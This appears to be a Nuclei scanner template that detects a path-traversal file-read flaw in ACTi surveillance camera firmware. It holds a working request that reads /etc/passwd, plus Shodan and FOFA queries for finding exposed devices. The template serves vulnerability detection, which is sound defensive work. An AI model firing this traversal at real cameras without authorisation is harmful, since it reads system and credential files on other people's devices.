id: acti-video-lfi

info:
  name: ACTi-Video Monitoring - Local File Inclusion
  author: DhiyaneshDk
  severity: high
  description: |
    ACTI video surveillance has loopholes in reading any files
  reference:
    - https://www.cnblogs.com/hmesed/p/16292252.html
  classification:
    cpe: cpe:2.3:o:acti:camera_firmware:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: acti
    product: camera_firmware
    shodan-query: title:"Web Configurator"
    fofa-query: app="ACTi-视频监控"
  tags: acti,lfi,iot,video,monitoring

http:
  - method: GET
    path:
      - "{{BaseURL}}/images/../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "application/octet-stream"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ce355c188ea707e9057eef17ed43ce926b22072f7519abe899463ed2f1e11c3c022100b38bc99e1722c5c5357ae4048fe42f576c5e0a714e98878fc38044887e345301:922c64590222798bb761d5b6d8e72950